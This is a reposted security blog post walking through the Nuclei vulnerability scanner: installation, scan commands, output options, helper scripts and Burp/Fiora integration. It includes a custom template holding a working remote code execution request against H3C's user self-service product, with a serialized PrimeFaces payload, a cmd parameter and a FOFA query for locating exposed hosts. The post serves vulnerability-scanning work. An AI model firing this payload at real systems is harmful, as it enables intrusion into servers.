nuclei: first hands-on experience

admin, 2024-05-15 22:29:48

Project overview

Nuclei is a fast, customisable vulnerability scanner driven by templates written in YAML. It is written in Go and is highly configurable, extensible and easy to use.

Project links

https://nuclei.projectdiscovery.io                     // official site
https://github.com/projectdiscovery/nuclei             // tool download
https://github.com/projectdiscovery/nuclei-templates   // PoC template download

Installation

Nuclei is written in Go, so normally a Go toolchain is needed. I am on Windows here and simply download the prebuilt .exe, in which case no Go environment is required.


Download it and run it directly:


On its first run, Nuclei automatically downloads the latest nuclei-templates into the current user's home directory (/home/<current-user>/nuclei-templates).


Scanning a single target

nuclei -u https://test.com
# through a SOCKS5 proxy
nuclei -u https://test.com -p socks5://127.0.0.1:1080
# through an HTTP proxy
nuclei -u https://test.com -p http://127.0.0.1:8080

Scanning multiple targets

nuclei -list urls.txt
# through a SOCKS5 proxy
nuclei -list urls.txt -p socks5://127.0.0.1:1080
# through an HTTP proxy
nuclei -list urls.txt -p http://127.0.0.1:8080

Here urls.txt holds the target URLs. Whether you scan one target or many, each URL should consist of scheme, host and port only, with no path appended; otherwise the scan results will be affected.

http://test.com
http://admin.test.com
http://192.168.1.127:8080
http://192.168.1.127:50050
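The rule above (scheme, host and port only, no path) is easy to violate when a target list is assembled from crawler or browser output. As an added example that is not part of the original post, the following Python script normalises a urls.txt-style list into the form nuclei expects, drops default ports, assumes http for bare host:port entries and removes duplicates. The sample input is constructed and mirrors the list shown above plus the kinds of mistakes the post warns about.

```python
# Added example (not from the original post): normalise a nuclei target list so
# that each entry is scheme://host[:port] with no path, query or fragment.
from typing import List, Optional
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize_target(line: str) -> Optional[str]:
    """Reduce one target line to scheme://host[:port].

    Paths, query strings and fragments are dropped, a default port is omitted
    and a bare host[:port] without a scheme is assumed to be http.
    Returns None for blank lines, comments and entries that cannot be parsed.
    """
    url = line.strip()
    if not url or url.startswith("#"):
        return None
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    try:
        port = parts.port            # raises ValueError for a non-numeric port
    except ValueError:
        return None
    host = parts.hostname            # lower-cased, brackets stripped for IPv6
    if parts.scheme not in DEFAULT_PORTS or not host:
        return None
    if ":" in host:                  # IPv6 literal: put the brackets back
        host = f"[{host}]"
    if port is None or port == DEFAULT_PORTS[parts.scheme]:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


def normalize_target_list(lines) -> List[str]:
    """Normalise every line and keep the first occurrence of each target."""
    seen, out = set(), []
    for line in lines:
        target = normalize_target(line)
        if target and target not in seen:
            seen.add(target)
            out.append(target)
    return out


# Constructed sample input: a urls.txt with paths, a default port and a duplicate.
SAMPLE_URLS = """\
http://test.com
http://admin.test.com/login.jsp
http://192.168.1.127:8080/
http://192.168.1.127:50050
https://test.com:443/api/v1
192.168.1.127:8080
# a comment line is ignored
"""

if __name__ == "__main__":
    for target in normalize_target_list(SAMPLE_URLS.splitlines()):
        print(target)
```

Write the printed lines to a fresh urls.txt and pass that file to `nuclei -list`; entries that did not parse are dropped silently, so compare the line count against the input if you want to catch typos.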

Scan results can be exported:

# output results as JSON
nuclei -u https://example.com -json
# save results to result.txt
nuclei -u https://example.com -o result.txt
# save results as a Markdown report
nuclei -u https://example.com -me result
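The JSON output is one JSON object per line, which makes it the easiest format to feed into triage or ticketing. As an added example that is not part of the original post, the following Python script reads that line-delimited output, skips non-JSON lines such as progress messages, counts findings by severity and lists those at or above a chosen severity. The field names it reads (template-id, info.severity, host, matched-at) are the ones nuclei emits; the SAMPLE_OUTPUT lines are constructed for the example and are not real scan data.

```python
# Added example (not from the original post): parse nuclei's line-delimited JSON
# output and summarise findings by severity. SAMPLE_OUTPUT is constructed.
import json
from collections import Counter
from typing import Dict, List

SEVERITY_ORDER = ["critical", "high", "medium", "low", "info", "unknown"]
_RANK = {s: i for i, s in enumerate(SEVERITY_ORDER)}   # 0 = most severe


def parse_nuclei_jsonl(text: str) -> List[Dict[str, str]]:
    """Turn nuclei JSON-lines output into a list of flat finding dicts.

    Lines that are not JSON objects (banner, progress, stray text) are skipped
    so the parser survives a file where stdout and stderr were mixed.
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(rec, dict):
            continue
        info = rec.get("info") or {}
        findings.append({
            "template": rec.get("template-id", "?"),
            "name": info.get("name", ""),
            "severity": str(info.get("severity", "unknown")).lower(),
            "host": rec.get("host", "?"),
            "matched_at": rec.get("matched-at", "?"),
        })
    return findings


def summarize_by_severity(findings) -> Dict[str, int]:
    """Count findings per severity, omitting severities with no findings."""
    counts = Counter(f["severity"] for f in findings)
    return {s: counts[s] for s in SEVERITY_ORDER if counts[s]}


def findings_at_or_above(findings, threshold: str) -> List[Dict[str, str]]:
    """Findings whose severity is at least `threshold`, most severe first."""
    limit = _RANK.get(threshold.lower(), _RANK["unknown"])
    unknown = len(_RANK)
    kept = [f for f in findings if _RANK.get(f["severity"], unknown) <= limit]
    return sorted(kept, key=lambda f: (_RANK.get(f["severity"], unknown), f["host"]))


# Constructed sample output: four findings plus one non-JSON progress line.
SAMPLE_OUTPUT = """\
{"template-id":"example-missing-headers","info":{"name":"Missing security headers (constructed)","severity":"info"},"type":"http","host":"http://test.com","matched-at":"http://test.com","timestamp":"2024-05-15T22:29:48+08:00"}
{"template-id":"CVE-EXAMPLE-0001","info":{"name":"Example RCE (constructed placeholder)","severity":"critical"},"type":"http","host":"http://192.168.1.127:8080","matched-at":"http://192.168.1.127:8080/some/endpoint","timestamp":"2024-05-15T22:30:01+08:00"}
{"template-id":"example-tech-detect","info":{"name":"Technology detection (constructed)","severity":"info"},"type":"http","host":"http://admin.test.com","matched-at":"http://admin.test.com","timestamp":"2024-05-15T22:30:05+08:00"}
{"template-id":"H3C-RCE","info":{"name":"H3C self-service RCE (template id from the post)","severity":"high"},"type":"http","host":"http://192.168.1.127:50050","matched-at":"http://192.168.1.127:50050/mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml","timestamp":"2024-05-15T22:30:09+08:00"}
[INF] this line is a progress message, not a finding
"""

if __name__ == "__main__":
    results = parse_nuclei_jsonl(SAMPLE_OUTPUT)
    print("findings by severity:", summarize_by_severity(results))
    for f in findings_at_or_above(results, "high"):
        print(f'{f["severity"]:<8} {f["template"]:<24} {f["matched_at"]}')
```

In practice, replace SAMPLE_OUTPUT with the contents of the file written by `nuclei -json ... -o result.json`; the threshold filter is what you would wire to an alert so that only high and critical hits page anyone.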

Custom PoC templates

Take the RCE in H3C's user self-service product as an example:

Place the PoC in the templates directory:


For reproducing the vulnerability, see these two articles:

https://cloud.tencent.com/developer/article/2395674
https://blog.csdn.net/weixin_52204925/article/details/136610277

id: H3C-RCE

info:
  name: 华三用户自助服务产品存在远程代码执行,恶意攻击者可利用此漏洞执行恶意命令,从而获取服务器敏感信息或者服务器权限。
  author: WLF
  severity: high
  metadata:
    fofa-query: fid="tPmVs5PL6e9m5Xt0J4V2+A=="

variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
        Content-Length: 1573
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=echo Hello World!

    # the template matches only when the echoed string comes back in a 200 response
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Run it (-t points at the directory holding the custom template):

nuclei.exe -u http://xx.xx.xx.xx:8080/ -t zhang3 -o result.txt


Using Fiora together with nuclei

https://github.com/bit4woo/Fiora      // project page

Run it with java -jar xx.jar, or simply double-click to launch:


A local proxy needs to be configured:


Start the proxy tool:


Fiora calls the local nuclei binary, so its path must be added to the PATH environment variable:


It runs without problems:


Running Fiora as a Burp Suite extension

Install the extension


Just configure it:


Tool for automatically generating nuclei PoC templates

https://github.com/projectdiscovery/nuclei-burp-plugin   // project page


Capture a request and generate an initial PoC template from it


Adjust it a little and test that it works.

References

https://blog.csdn.net/weixin_41489908/article/details/113608943
https://www.cnblogs.com/cijian9000/p/16006359.html
https://www.freebuf.com/articles/network/235745.html
https://blog.csdn.net/asaotomo/article/details/122395708
https://blog.csdn.net/qq_41315957/article/details/126594670


Originally published on the WeChat official account NoteSec under the title "nuclei-初体验".

When reposting, please keep the link to this article (CN-SEC: thanks to the original author for their hard work): https://cn-sec.com/archives/2744926.html